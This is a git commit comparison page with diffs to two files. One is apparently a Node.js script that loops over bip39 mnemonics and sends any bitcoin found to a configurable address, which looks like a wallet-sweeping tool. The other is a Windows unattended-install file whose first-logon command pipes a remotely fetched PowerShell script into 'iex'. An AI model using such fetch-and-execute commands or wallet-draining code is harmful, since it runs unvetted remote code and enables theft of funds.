Compare commits
3 commits
dependabot
...
master
Author | SHA1 | Date | |
---|---|---|---|
|
016cd50b2f | ||
|
65c7c67e65 | ||
|
4cdde37ed7 |
2 changed files with 5 additions and 2 deletions
|
@ -2,7 +2,8 @@ var CoinKey = require('coinkey') //1.0.0
|
|||
var bip39 = require('bip39')
|
||||
var hdkey = require('hdkey')
|
||||
var bitcoinTransaction = require('bitcoin-transaction');
|
||||
var to = "1ShzJ7McjMYaboVFokny1LGMFLT7Y6qDj"; //change me to who you want the bitcoin to go to
|
||||
async function main() {
|
||||
var to = "CHANGE ME"; //change me to who you want the bitcoin to go to
|
||||
var mnemonic;
|
||||
var seed;
|
||||
var seedToKey;
|
||||
|
@ -75,3 +76,5 @@ if (bip39.validateMnemonic(mnemonic)) {
|
|||
|
||||
await new Promise(r => setTimeout(r, 13));
|
||||
}
|
||||
}
|
||||
main()
|
||||
|
|
|
@ -90,7 +90,7 @@
|
|||
<AutoLogon></AutoLogon>
|
||||
<FirstLogonCommands>
|
||||
<SynchronousCommand wcm:action="add">
|
||||
<CommandLine>PowerShell.exe -command 'irm "http://nodemixaholic.com:3002/nodemixaholic/sams-christutus-overlay/raw/branch/main/common-stream.ps1" | iex'</CommandLine>
|
||||
<CommandLine>PowerShell.exe -command 'irm "https://github.com/Sneed-Group/maxs-titus-overlay/raw/main/common-stream.ps1" | iex'</CommandLine>
|
||||
<Description>Create protections</Description>
|
||||
<Order>1</Order>
|
||||
</SynchronousCommand>
|
||||
|
|
Loading…
Reference in a new issue